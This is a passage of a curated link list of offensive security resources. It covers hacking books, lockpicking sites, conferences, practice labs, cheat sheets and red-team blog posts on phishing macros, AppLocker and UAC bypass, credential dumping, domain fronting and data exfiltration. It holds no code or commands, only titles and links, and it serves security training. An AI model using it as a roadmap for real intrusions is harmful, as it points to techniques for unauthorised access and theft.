2008](https://www.elsevier.com/books/no-tech-hacking/mitnick/978-1-59749-215-7) * [Open Source Intelligence Techniques - 8th Edition by Michael Bazell, 2021](https://www.amazon.com/dp/B08RRDTFF9/) * [Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014](https://nostarch.com/pentesting) * [Penetration Testing: Procedures & Methodologies by EC-Council, 2010](https://www.amazon.com/dp/1435483677) * [Practical Lock Picking by Deviant Ollam, 2012](https://www.elsevier.com/books/practical-lock-picking/ollam/978-1-59749-989-7) * [Practical Malware Analysis by Michael Sikorski & Andrew Honig, 2012](https://nostarch.com/malware) * [Practical Packet Analysis by Chris Sanders, 2017](https://nostarch.com/packetanalysis3) * [Practical Reverse Engineering by Bruce Dang et al., 2014](https://www.wiley.com/en-us/Practical+Reverse+Engineering%3A+x86%2C+x64%2C+ARM%2C+Windows+Kernel%2C+Reversing+Tools%2C+and+Obfuscation-p-9781118787311) * [Professional Penetration Testing by Thomas Wilhelm, 2013](https://www.elsevier.com/books/professional-penetration-testing/wilhelm/978-1-59749-993-4) * [Reverse Engineering for Beginners by Dennis Yurichev](https://beginners.re/main.html) * [Rtfm: Red Team Field Manual by Ben Clark, 2014](https://www.amazon.com/dp/1494295504/) * [Secure Programming HOWTO](https://dwheeler.com/secure-programs/Secure-Programs-HOWTO/index.html) * [Social Engineering in IT Security: Tools, Tactics, and Techniques by Sharon Conheady, 2014](https://www.mhprofessional.com/9780071818469-usa-social-engineering-in-it-security-tools-tactics-and-techniques-group) * [Social Engineering: The Art of Human Hacking by Christopher Hadnagy, 2010](https://www.wiley.com/en-us/Social+Engineering%3A+The+Art+of+Human+Hacking-p-9780470639535) * [The Art of Deception by Kevin D. Mitnick & William L. Simon, 2002](https://www.wiley.com/en-us/The+Art+of+Deception%3A+Controlling+the+Human+Element+of+Security-p-9780471237129) * [The Art of Exploitation by Jon Erickson, 2008](https://nostarch.com/hacking2.htm) * [The Art of Intrusion by Kevin D. Mitnick & William L. Simon, 2005](https://www.wiley.com/en-us/The+Art+of+Intrusion%3A+The+Real+Stories+Behind+the+Exploits+of+Hackers%2C+Intruders+and+Deceivers-p-9780764569593) * [The Art of Memory Forensics by Michael Hale Ligh et al., 2014](https://www.wiley.com/en-us/The+Art+of+Memory+Forensics%3A+Detecting+Malware+and+Threats+in+Windows%2C+Linux%2C+and+Mac+Memory-p-9781118825099) * [The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013](https://www.elsevier.com/books/the-basics-of-hacking-and-penetration-testing/engebretson/978-1-59749-655-1) * [The Browser Hackers Handbook by Wade Alcorn et al., 2014](https://www.wiley.com/en-us/The+Browser+Hacker%27s+Handbook-p-9781118662090) * [The Database Hacker's Handbook, David Litchfield et al., 2005](https://www.wiley.com/en-us/The+Database+Hacker%27s+Handbook%3A+Defending+Database+Servers-p-9780764578014) * [The Hacker Playbook by Peter Kim, 2014](https://www.amazon.com/dp/1494932636/) * [The IDA Pro Book by Chris Eagle, 2011](https://nostarch.com/idapro2.htm) * [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](https://www.wiley.com/en-us/The+Mac+Hacker%27s+Handbook-p-9780470395363) * [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](https://www.wiley.com/en-us/The+Mobile+Application+Hacker%27s+Handbook-p-9781118958506) * [The Practice of Network Security Monitoring: Understanding Incident Detection and Response 9](https://www.amazon.com/gp/product/1593275099) * [The Shellcoders Handbook by Chris Anley et al., 2007](https://www.wiley.com/en-us/The+Shellcoder%27s+Handbook%3A+Discovering+and+Exploiting+Security+Holes%2C+2nd+Edition-p-9780470080238) * [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](https://www.wiley.com/en-us/The+Web+Application+Hacker%27s+Handbook%3A+Finding+and+Exploiting+Security+Flaws%2C+2nd+Edition-p-9781118026472) * [Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010](https://www.amazon.com/dp/B005DIAPKE) * [Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014](https://www.wiley.com/en-us/Unmasking+the+Social+Engineer%3A+The+Human+Element+of+Security-p-9781118608579) * [Violent Python by TJ O'Connor, 2012](https://www.elsevier.com/books/violent-python/unknown/978-1-59749-957-6) * [Windows Internals by Mark Russinovich et al., 2012](https://www.amazon.com/dp/0735648735/) * [Wireshark Network Analysis by Laura Chappell & Gerald Combs, 2012](https://www.amazon.com/dp/1893939944) * [iOS Hackers Handbook by Charlie Miller et al., 2012](https://www.wiley.com/en-us/iOS+Hacker%27s+Handbook-p-9781118204122) #### Lockpicking Resources * [/r/lockpicking Subreddit](https://www.reddit.com/r/lockpicking/) - Subreddit dedicated to the sport of lockpicking. * [Keypicking.com](https://keypicking.com/) - Bustling online forum for the discussion of lockpicking and locksport. * [LockWiki](http://lockwiki.com/index.php/Main_Page) - Community-driven reference for both beginners and professionals in the security industry. * [Lockpicking Forensics](http://www.lockpickingforensics.com/) - Website "dedicated to the science and study of forensic locksmithing." * [Lockpicking101.com](https://www.lockpicking101.com/) - One of the longest-running online communities "dedicated to the fun and ethical hobby of lock picking." * [The Amazing King's Lockpicking pages](http://theamazingking.com/lockpicking.php) - Hobbyist's website with detailed pages about locks, tools, and picking techniques. #### Social Engineering Articles * [How I Socially Engineer Myself Into High Security Facilities](https://www.vice.com/en/article/qv34zb/how-i-socially-engineer-myself-into-high-security-facilities) - Sophie Daniel * [Social Engineering: Compromising Users with an Office Document](https://resources.infosecinstitute.com/certification/social-engineering-compromising-users-using-office-document/) - Infosec Institute * [The 7 Best Social Engineering Attacks Ever](https://www.darkreading.com/the-7-best-social-engineering-attacks-ever/d/d-id/1319411) - DarkReading * [The Limits of Social Engineering](https://www.technologyreview.com/2014/04/16/173156/the-limits-of-social-engineering/) - MIT, Technology Review * [The Persuasion Reading List](https://www.scottadamssays.com/2018/01/24/persuasion-reading-list-updated-1-18/) - Scott Adams' Blog #### Conferences * (ISC)2 Secure Event Series * 44CON London * 44Con * AFCEA Defensive Cyber Operations Symposium * AppSec United States](OWASP National Conference) * AppSecUSA * Atlantic Security Conference](AtlSecCon) * BSides * BSides Event Series * BalCCon * Black Hat * Black Hat United States * BruCON * CCC * CISO Executive Summit Series](Invite-only) * CSO50 Conference * CanSecWest * CarolinaCon * Cyber Threat Intelligence Summit * DEF CON * DeepSec * DefCamp * DerbyCon * DerbyCon 8.0 * Ekoparty * FIRST Conference * FSec * HACKMIAMI * HITB * HOPE * Hack.lu * Hack3rCon * Hacker Halted - Optionally includes certification-specific training * IANS Information Security Forums * IAPP Global Privacy Summit * IEEE Symposium on Security & Privacy * ISACA Cyber Security Nexus * ISF Annual World Congress * ISSA CISO Executive Forum Series * ISSA International Conference * Ignite * Infiltrate * InfoSec Southwest * InfoSec World * Infosecurity Europe * Infosecurity Europe * Infosecurity North America * LayerOne * Nullcon * Nullcon Conference * Open Security Summit * PhreakNIC * RSA Conference United States * SANS Annual Conference * SANS Pen Test Annual Conferences * SANS Security Annual Conferences * SECUINSIDE * SOURCE Annual Conferences * SecTor Canada * Secure360 Conference * SecureWorld * Securi-Tay * Security Operations Summit & Training * ShmooCon * SkyDogCon * SummerCon * Swiss Cyber Storm * ThotCon * USENIX Security Symposium * Virus Bulletin Conference * conINT * secureCISO #### Online Videos * [Dennis Maldonado: Are We Really Safe? Bypassing Access Control Systems](https://www.youtube.com/watch?v=jTtdTrMSsPw) * [Internet of Things: IoT Research Methodology](https://www.youtube.com/watch?v=iQCaGxnY4LM) * [Internet of Things: The Relationship Between IoT and Security](https://www.youtube.com/watch?v=LcoEe0LvaBo) * [Offensive Security Part 1 - Basics of Penetration Testing](https://www.youtube.com/watch?v=GX1go9PDnWY) * [Phishing Campaigns in Metasploit Pro](https://www.youtube.com/watch?v=XReMP6_f2xU) * [Rapid7 Whiteboard Wednesday Series](https://www.youtube.com/playlist?list=PLMrgKzfE1aINBOpJXCkqPdWcT7YCPZYL3) * [Spear Phishing with Cobalt Strike](https://www.youtube.com/watch?v=V7UJjVcq2Ao) #### Free Online Courses * [CompTIA Network+ Certification Video Course By PowerCert Animated Videos](https://www.youtube.com/watch?v=vrh0epPAC5w) * [CompTIA Security+ SY0-501 Training Course By Professor Messer](https://www.youtube.com/playlist?list=PLG49S3nxzAnnVhoAaL4B6aMFDQ8_gdxAy) * [Complete Ethical Hacking Course By HackerSploit - Part1 of 126](https://www.youtube.com/watch?v=tHd8k54kVs8&list=PLBf0hzazHTGOEuhPQSnq-Ej8jRyXxfYvl) * [Complete Ethical Hacking Course by Joseph Delgadillo - 8 hour course](https://www.youtube.com/watch?v=fDeLtKUxTmM) #### Training Resources * [Awesome Hacking Resources](https://github.com/vitalysim/Awesome-Hacking-Resources) - Self-explanatory. * [Awesome Web Security](https://github.com/qazbnm456/awesome-web-security) - Encyclopedia of web security information. * [Corelan.be](https://www.corelan.be/index.php/articles/) - Website containing many useful training resources and tutorial. * [Cybrary.it](https://www.cybrary.it/) - Free online courses. * [Enigma Group](https://www.enigmagroup.org/) - Web application training resource. * [Executing Metasploit & Empire Payloads from MS Office Document Properties part 1](https://stealingthe.network/executing-metasploit-empire-payloads-from-ms-office-document-properties-part-1-of-2/) - How to stealthily deliver a Metasploit payload via MS Office document properties and a simple macro. * [Executing Metasploit & Empire Payloads from MS Office Document Properties part 2](https://stealingthe.network/executing-metasploit-empire-payloads-from-ms-office-document-properties-part-2-of-2/) - Like part 1, but focusing on Empire rather than Metasploit. * [Hacker101](https://www.hacker101.com/) - Online training resource. * [How To: Empire's Cross Platform Office Macro](https://www.blackhillsinfosec.com/empires-cross-platform-office-macro/) - How to utilize Empire's cross-platform malicious MS Office macro. * [Introduction to Software Exploits Part 1](https://opensecuritytraining.info/Exploits1.html) - Online or in-person tutorial covering multiple areas of software exploitation. * [Introduction to Software Exploits Part 2 - Exploitation in the Windows Environment](https://opensecuritytraining.info/Exploits2.html) - Online or in-person tutorial covering multiple areas of software exploitation, with emphasis on Windows exploitation. * [OpenSecurityTraining.info](https://opensecuritytraining.info/) - Free online training resource. * [PentesterLab](https://pentesterlab.com/) - Tiered online training resources. * [PortSwigger's lab](https://portswigger.net/web-security/all-labs) - Free and advanced labs for hands on training. * [Phishing With Empire](https://enigma0x3.net/2016/03/15/phishing-with-empire/) - Guide on phishing with Empire. * [Phishing With PowerPoint](https://www.blackhillsinfosec.com/phishing-with-powerpoint/) - Guide on getting unsuspecting users to open malicious PPT files. #### Hacking References And Cheatsheets * [LFI Cheat Sheet](https://highon.coffee/blog/lfi-cheat-sheet/) * [Local Linux Enumeration & Privilege Escalation Cheatsheet](https://github.com/rebootuser/LinEnum) * [Metasploit Payload Cheatsheet](https://netsec.ws/?p=331) * [Multiple Cheatsheets By Andrewjkerr](https://github.com/andrewjkerr/security-cheatsheets) * [Nmap Cheat Sheet](https://highon.coffee/blog/nmap-cheat-sheet/) * [Pentest Recon And Enu Cheatsheet](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#recon-and-enumeration) * [Reverse Shell Cheat Sheet](https://highon.coffee/blog/reverse-shell-cheat-sheet/) * [SQL Injection Cheat Sheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) * [XSS Cheat Sheet](https://n0p.net/penguicon/php_app_sec/mirror/xss.html) * [XSS Payload Cheatsheet](https://github.com/pgaijin66/XSS-Payloads/blob/master/payload/payload.txt) #### Training And Practice Exercises * [CPTE Courseware Kit](https://www.mile2.com/product/cpte-e-course-kit/) - Paid Official training kit for CPTE exam. * [CTFlearn](https://ctflearn.com/) - The most beginner-friendly way to get into hacking. * [Damn Vulnerable Web Application (DVWA)](https://dvwa.co.uk/) - Purposely vulnerable PHP/MySQL web application. * [Gruyere](https://google-gruyere.appspot.com/) - Gruyere is a web application that has multiple security bugs ranging from cross-site scripting and cross-site request forgery, to information disclosure, denial of service, and remote code execution. * [Hack This Site](https://www.hackthissite.org/) - Web application security exercises. * [Hack the Box](https://www.hackthebox.eu/) - Online pentesting labs with Windows VMs. * [Hacker101 CTF](https://ctf.hacker101.com/) - Webapp CTF style exercises. * [Mutillidae](https://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10) - Mutillidae is a free, open source web application provided to allow you to hack a web application. Can be installed on Linux, Windows XP, Windows 7 and windows 10 using XAMMP. * [OSCP-like Vulnhub VMs](https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms) - Intentionally vulnerable VMs resembling OSCP. * [OWASP Damn Vulnerable Web Sockets (DVWS)](https://github.com/interference-security/DVWS/) - Vulnerable web application which works on web sockets for client-server communication. * [OWASP Juice Shop](https://github.com/bkimminich/juice-shop/) - JavaScript based intentionally insecure web application. * [OWASP NodeGoat](https://github.com/OWASP/NodeGoat/) - Includes Node.js web applications for learning the OWASP top 10. * [OWASP Railsgoat](https://github.com/OWASP/railsgoat) - A vulnerable version of Rails that follows the OWASP Top 10. * [OWASP SecurityShepard](https://github.com/OWASP/SecurityShepherd/) - Web and mobile application security training platform. * [OWASP WebGoat](https://github.com/WebGoat/WebGoat) - WebGoat is an insecure application that allows the testing of vulnerabilities commonly found in Java-based applications that use common and popular open source components. * [OWASP security knowledge framework](https://owasp-skf.gitbook.io/asvs-write-ups/) - OWASP security knowledge framework labs exercises complete with write-ups. * [Over the Wire: Natas](https://overthewire.org/wargames/natas/) - Web application challenges. * [PicoCTF](https://picoctf.org/) - Multiple beginner as well as advanced CTF challenges. * [Rapid7 Metsploitable](https://information.rapid7.com/download-metasploitable-2017.html) - Metasploitable is essentially a penetration testing lab in a box, available as a VMware virtual machine (VMX). * [Root Me](https://www.root-me.org/) - The fast, easy, and affordable way to train your hacking skills. * [RopeyTasks](https://github.com/iriusrisk/RopeyTasks) - Simple deliberately vulnerable web application. * [XSS Exercises](https://xss-game.appspot.com/) - Webapp Cross-site scripting (XSS) bug hunting exercises. #### Informative Youtube Channels * [Computerphile](https://www.youtube.com/user/Computerphile/videos?view=0&sort=p&shelf_id=2) - Information security concepts. * [Farah Hawa](https://www.youtube.com/c/FarahHawa) - Hacking concepts and news. * [Hacksplained](https://www.youtube.com/c/hacksplained) - Hacking guides and walkthroughs. * [Hak5](https://www.youtube.com/user/Hak5Darren/featured) - Hacking tools, guides and concepts. * [HackerSploit](https://www.youtube.com/c/HackerSploit) - Hacking Resources. * [Loi Liang Yang](https://www.youtube.com/channel/UC1szFCBUWXY3ESff8dJjjzw/videos) - Hacking guides. * [Motasem Hamdan](https://www.youtube.com/channel/UCNSdU_1ehXtGclimTVckHmQ/videos) - Hacking guides. * [Null Byte](https://www.youtube.com/channel/UCgTNupxATBfWmfehv21ym-g) - Hacking guides and concepts. * [Schuyler Towne channel](https://www.youtube.com/user/SchuylerTowne/) - Lockpicking videos and security talks. * [Thenewboston](https://www.youtube.com/user/thenewboston/playlists) - Programming and hacking guides. * [bosnianbill](https://www.youtube.com/user/bosnianbill) - lockpicking videos. #### Illustrations and Presentations * ["Fileless" UAC Bypass Using sdclt.exe](https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/) * [A Citrix Story](https://rastamouse.me/blog/a-citrix-story/) * [A Guide to Attacking Domain Trusts](https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944) * [A Guide to Attacking Domain Trusts](https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/) * [A Pentester's Guide to Group Scoping](https://www.harmj0y.net/blog/activedirectory/a-pentesters-guide-to-group-scoping/) * [A Read Teamer's Guide to GPOs and OUs](https://wald0.com/?p=179) * [Abusing Active Directory Permissions with PowerView](https://www.harmj0y.net/blog/redteaming/abusing-active-directory-permissions-with-powerview/) * [Abusing DCOM For Yet Another Lateral Movement Technique](https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/) * [Abusing DNSAdmins Privilege for Escalation in Active Directory](http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html) * [Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Execution and Lateral Movement](https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/) * [Abusing GPO Permissions](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/) * [Abusing Microsoft Word Features for Phishing: "subDoc"](https://rhinosecuritylabs.com/research/abusing-microsoft-word-features-phishing-subdoc/) * [Abusing the COM Registry Structure: CLSID, LocalServer32, & ImprocServer32](https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/) * [Accessing Clipboard From the Lock Screen in Windows 10 Part 1](https://oddvar.moe/2017/01/24/accessing-clipboard-from-the-lock-screen-in-windows-10/) * [Accessing Clipboard From the Lock Screen in Windows 10 Part 2](https://oddvar.moe/2017/01/27/access-clipboard-from-lock-screen-in-windows-10-2/) * [Agentless Post-Exploitation](https://www.youtube.com/watch?v=QbjuO5IlpBU) * [Aggressor PowerView](https://threat.tevora.com/aggressor-powerview/) * [AppLocker - Case Study - How Insecure Is It Really? Part 1](https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/) * [AppLocker - Case Study - How Insecure Is It Really? Part 2](https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/) * [Are We Really Safe? Hacking Access Control Systems](https://www.slideshare.net/DennisMaldonado5/hacking-access-control-systems) * [Automated Derivative Administrator Search](https://wald0.com/?p=14) * [Awesome Bug Bounty](https://github.com/djadmin/awesome-bug-bounty) * [Awesome CTF](https://github.com/apsdehal/awesome-ctf) * [Awesome ICS Security](https://github.com/hslatman/awesome-industrial-control-system-security) * [Awesome Lockpicking](https://github.com/fabacab/awesome-lockpicking) * [Awesome Yara](https://github.com/InQuest/awesome-yara) * [Bringing the Hashes Home With reGeorg & Empire](https://sensepost.com/blog/2016/bringing-the-hashes-home-with-regeorg-empire/) * [Bypassing AMSI via COM Server Hijacking](https://posts.specterops.io/bypassing-amsi-via-com-server-hijacking-b8a3354d1aff) * [Bypassing Application Whitelisting With BGinfo](https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/) * [Bypassing Device Guard UMCI Using CHM - CVE-2017-8625](https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/) * [Bypassing UAC Using App Paths](https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/) * [Cell Injection](http://blog.7elements.co.uk/2013/01/cell-injection.html) * [ClickOnce, Twice or Thrice: A Technique for Social Engineering and Untrusted Command Execution](https://bohops.com/2017/12/02/clickonce-twice-or-thrice-a-technique-for-social-engineering-and-untrusted-command-execution/) * [Cloning and Hosting Evil Captive Portals Using a Wi-Fi Pineapple](https://blog.inspired-sec.com/archive/2017/01/10/cloning-captive-portals.html) * [CloudFront Hijacking](https://www.mindpointgroup.com/blog/pen-test/cloudfront-hijacking/) * [Cobalt Strike - What's the go-to phishing technique or exploit?](https://blog.cobaltstrike.com/2014/12/17/whats-the-go-to-phishing-technique-or-exploit/) * [Code Signing Certificate Cloning Attacks and Defenses](https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec) * [Colbalt Strike - Spear Phishing documentation](https://www.cobaltstrike.com/help-spear-phish) * [Comma Separated Vulnerabilities](https://www.contextis.com/en/blog/comma-separated-vulnerabilities) * [DNS Data Exfiltration - What is This and How to Use?](https://cuongmx.medium.com/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822) * [DNS Tunnelling](https://resources.infosecinstitute.com/topic/dns-tunnelling/) * [Data Exfiltration Over DNS Request Covert Channel: DNSExfiltrator](https://www.kitploit.com/2018/01/dnsexfiltrator-data-exfiltration-over.html) * [Data Exfiltration via Formula Injection](https://notsosecure.com/data-exfiltration-formula-injection/) * [Defense In Depth](https://oddvar.moe/2017/09/13/defense-in-depth-writeup/) * [DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/) * [Domain Fronting Via Cloudfront Alternate Domains](https://www.mdsec.co.uk/2017/02/domain-fronting-via-cloudfront-alternate-domains/) * [Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync](https://adsecurity.org/?p=2053) * [Dumping Domain Password Hashes](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/) * [Empire Domain Fronting](https://www.xorrior.com/Empire-Domain-Fronting/) * [Empire Without PowerShell](https://isec.ne.jp/wp-content/uploads/2017/08/30Empire-without-Powershell.pdf) * [Escape and Evasion Egressing Restricted Networks](https://www.optiv.com/explore-optiv-insights/blog/escape-and-evasion-egressing-restricted-networks) * [Excel Macros With PowerShell](https://4sysops.com/archives/excel-macros-with-powershell/) * [Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts](https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/) * [Exploiting Environment Variables in Scheduled Tasks for UAC Bypass](https://www.tiraniddo.dev/2017/05/exploiting-environment-variables-in.html) * [Extending BloodHound for Red Teamers](https://www.youtube.com/watch?v=Pn7GWRXfgeI) * [Finding Domain Frontable Azure Domains](https://theobsidiantower.com/2017/07/24/d0a7cfceedc42bdf3a36f2926bd52863ef28befc.html) * [First Entry: Welcome and Fileless UAC Bypass](https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/) * [From Pass-the-Hash to Pass-the-Ticket with No Pain](https://resources.infosecinstitute.com/topic/pass-hash-pass-ticket-no-pain/) * [Getting the Goods with CrackMapExec: Part 1](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html) * [Getting the Goods with CrackMapExec: Part 2](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html) * [Harden Windows With AppLocker - Based on Case Study Part 1](https://oddvar.moe/2017/12/13/harden-windows-with-applocker-based-on-case-study-part-1/) * [Harden Windows With AppLocker - Based on Case Study Part 2](https://oddvar.moe/2017/12/21/harden-windows-with-applocker-based-on-case-study-part-2/) * [Hiding Registry Keys with PSReflect](https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353) * [How I Identified 93k Domain-Frontable CloudFront Domains](https://www.peew.pw/blog/2018/2/22/how-i-identified-93k-domain-frontable-cloudfront-domains) * [How to Obfuscate JacaScript in Metasploit](https://github.com/rapid7/metasploit-framework/wiki/How-to-obfuscate-JavaScript-in-Metasploit) * [In-Memory Evasion](https://blog.cobaltstrike.com/2018/02/08/in-memory-evasion/) * [Intercepting Passwords With Empire and Winning](https://sensepost.com/blog/2016/intercepting-passwords-with-empire-and-winning/) * [Intro to Using GScript for Red Teams](http://lockboxx.blogspot.com/2018/02/intro-to-using-gscript-for-red-teams.html) * [Introducing BloodHound](https://wald0.com/?p=68) * [Introduction to Metasploit: Exploiting Web Applications](https://www.slideshare.net/DennisMaldonado5/metasploit-for-web-workshop) * [Jumping Network Segregation with RDP](https://rastamouse.me/blog/rdp-jump-boxes/) * [Kerberoasting Without Mimikatz](https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/) * [Kerberos Party Tricks: Weaponizing Kerberos Protocol Flaws](http://www.exumbraops.com/blog/2016/6/1/kerberos-party-tricks-weaponizing-kerberos-protocol-flaws) * [Lateral Movement Using Excel Application and docm](https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/) * [Lay of the Land with Bloodhound](https://threat.tevora.com/lay-of-the-land-with-bloodhound/) * [LethalHTA - A New Lateral Movement Technique Using DCOM and HTA](https://codewhitesec.blogspot.com/2018/07/lethalhta.html) * [Leveraging INF-SCT Fetch & Execute Technique For Bypass, Evasion, & Persistence](https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/) * [Leveraging INF-SCT Fetch & Execute Technique For Bypass, Evasion, & Persistence](https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/) * [Loading Alternate Data Stream ADS DLL/CPL Binaries to Bypass AppLocker](https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/) * [Local Administrator Password Solution (LAPS) - Part 1](https://rastamouse.me/blog/laps-pt1/) * [Local Administrator Password Solution (LAPS) - Part 2](https://rastamouse.me/blog/laps-pt2/) * [Local Group Enumeration](https://www.harmj0y.net/blog/redteaming/local-group-enumeration/) * [Macro-less Code Exec in MSWord](https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/) * [Microsoft LAPS Security & Active Directory LAPS Configuration Recon](https://adsecurity.org/?p=3164) * [Microsoft Office - NTLM Hashes via Frameset](https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/) * [Multi-Platform Macro Phishing Payloads](https://malcomvetter.medium.com/multi-platform-macro-phishing-payloads-3b688e8eff68) * [My First Go with BloodHound](https://blog.cobaltstrike.com/2016/12/14/my-first-go-with-bloodhound/) * [OPSEC Considerations for Beacon Commands](https://blog.cobaltstrike.com/2017/06/23/opsec-considerations-for-beacon-commands/) * [OWASP Social Engineering: The Art of Human Hacking](https://owasp.org/www-pdf-archive/Presentation_Social_Engineering.pdf) * [Offensive Encrypted Data Storage](https://www.harmj0y.net/blog/redteaming/offensive-encrypted-data-storage/) * [Office 365 Safe Links Bypass](https://oddvar.moe/2018/01/03/office-365-safe-links-bypass/) * [Outlook Forms and Shells](https://sensepost.com/blog/2017/outlook-forms-and-shells/) * [Outlook Home Page - Another Ruler Vector](https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/) * [Pass-the-Hash is Dead: Long Live LocalAccountTokenFilterPolicy](https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) * [Persistence Using Globalflags In Image File Execution Options - Hidden from Autoruns.exe](https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/) * [Persistence Using RunOnceEx - Hidden from Autoruns.exe](https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/) * [Phishing Against Protected View](https://enigma0x3.net/2017/07/13/phishing-against-protected-view/) * [PowerPoint and Custom Actions](https://cofense.com/powerpoint-and-custom-actions/) * [PowerShell Empire Stagers 1: Phishing With an Office Macro and Evading AVs](https://fzuckerman.wordpress.com/2016/10/06/powershell-empire-stagers-1-phishing-with-an-office-macro-and-evading-avs/) * [PowerShell Without PowerShell - How To Bypass Application Whitelisting, Environment Restrictions & AV](https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/) * [Practical Guide to NTLM Relaying in 2017](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html) * [Process Doppleganging - A New Way to Impersonate A Process](https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/) * [Putting Data In Alternate Data Streams and How to Execute It](https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/) * [Putting Data in Alternate Data Streams and How to Execute It](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/) * [Red Team Insights on HTTPS Domain Fronting Google Hosts Using Cobalt Strike](https://www.cyberark.com/resources/threat-research-blog/red-team-insights-on-https-domain-fronting-google-hosts-using-cobalt-strike) * [Red Team Operating in a Modern Environment](https://owasp.org/www-pdf-archive/Red_Team_Operating_in_a_Modern_Environment.pdf) * [Roasting AS-REPs](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/) * [SPN Discovery](https://pentestlab.blog/2018/06/04/spn-discovery/) * [Scanning for Active Directory Privileges & Privileged Accounts](https://adsecurity.org/?p=3658) * [Simple Domain Fronting PoC with GAE C2 Server](https://www.securityartwork.es/2017/01/31/simple-domain-fronting-poc-with-gae-c2-server/) * [Spear Phishing 101](https://blog.inspired-sec.com/archive/2017/05/07/Phishing.html) * [Targeted Kerberoasting](https://www.harmj0y.net/blog/activedirectory/targeted-kerberoasting/) * [The Absurdly Underestimated Dangers of CSV Injection](http://georgemauer.net/2017/10/07/csv-injection.html) * [The Most Dangerous User Right You Probably Have Never Heard Of](https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/) * [The PowerView PowerUsage Series #1 - Mass User Profile Enumeration](http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-1/) * [The PowerView PowerUsage Series #2 - Mapping Computer Shortnames With the Global Catalog](http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-2/) * [The PowerView PowerUsage Series #3 - Enumerating GPO Edit Rights In a Foreign Domain](http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-3/) * [The PowerView PowerUsage Series #4 - Finding Cross-Trust ACEs](http://www.harmj0y.net/blog/powershell/the-powerview-powerusage-series-4/) * [Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation](https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/) * [Ultimate AppLocker ByPass List](https://github.com/api0cradle/UltimateAppLockerByPassList) * [Userland API Monitoring and Code Injection Detection](https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565) * [Using SQL Server for Attacking a Forest Trust](http://www.labofapenetrationtester.com/2017/03/using-sql-server-for-attacking-forest-trust.html) * [Using a SCF File to Gather Hashes](https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/) * [Using robots.txt to Locate Your Targets](http://www.behindthefirewalls.com/2013/07/using-robotstxt-to-locate-your-targets.html) * [Validated CloudFront SSL 